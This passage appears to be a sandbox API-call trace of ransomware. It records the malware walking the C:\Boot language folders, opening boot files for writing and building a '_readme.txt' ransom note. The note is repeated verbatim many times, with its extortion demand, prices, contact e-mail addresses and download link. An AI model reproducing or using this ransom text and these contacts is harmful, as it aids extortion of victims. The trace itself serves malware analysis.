(pszPath="C:\\Boot\\") returned="Boot\\" [0210.037] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.037] PathFindFileNameW (pszPath="") returned="" [0210.037] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.037] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.038] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.038] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.038] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0210.038] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0210.038] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.038] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.038] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.039] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.039] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0210.039] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.039] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.039] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.039] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.039] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0210.039] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.039] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.039] PathFindFileNameW (pszPath="") returned="" [0210.040] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.040] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.040] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.040] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.040] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0210.040] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0210.041] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.041] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.041] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.041] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.041] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0210.041] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.042] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.042] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.042] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.042] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0210.042] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.042] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.042] PathFindFileNameW (pszPath="") returned="" [0210.042] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.043] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.043] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.043] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.043] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0210.043] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0210.043] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.043] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.043] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.043] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.044] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0210.044] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.044] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.044] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.044] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.044] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0210.044] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.044] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.044] PathFindFileNameW (pszPath="") returned="" [0210.044] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.045] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.045] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.045] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.045] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0210.045] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0210.045] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your 